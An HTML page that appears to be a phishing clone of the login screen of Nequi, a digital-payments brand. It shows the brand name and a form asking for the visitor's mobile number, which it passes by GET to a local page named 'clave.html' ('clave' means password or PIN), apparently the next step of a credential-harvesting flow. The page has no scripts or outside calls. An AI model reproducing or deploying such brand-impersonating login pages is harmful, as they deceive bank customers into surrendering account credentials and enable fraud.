<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login Page</title>
    <style>
        body {
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            background-color: #2e002e;
            font-family: Arial, sans-serif;
        }

        .login-container {
            text-align: center;
            color: white;
        }

        .login-container img {
            width: 100px; /* Ajustar tamaño según sea necesario */
        }

        .login-container h1 {
            font-size: 48px;
            color: #fff;
        }

        .login-container h1 span {
            font-size: 24px;
            color: #00bcd4;
        }

        .login-container h2 {
            color: #ff1744;
            font-size: 18px;
        }

        .login-container input[type="text"] {
            width: 80%;
            padding: 10px;
            margin: 10px 0;
            border: none;
            border-radius: 5px;
        }

        .login-container button {
            width: 85%;
            padding: 10px;
            background-color: #ff0066;
            border: none;
            border-radius: 5px;
            color: white;
            font-size: 18px;
            cursor: pointer;
        }

        .login-container button:hover {
            background-color: #e6005c;
        }
    </style>
</head>
<body>
    <div class="login-container">
       
        <h1>Nequi </h1>
        <form action="clave.html" method="get">
            <input type="text" name="phone" placeholder="Número de celular" required>
            <button type="submit">Entra</button>
        </form>
    </div>
</body>
</html>
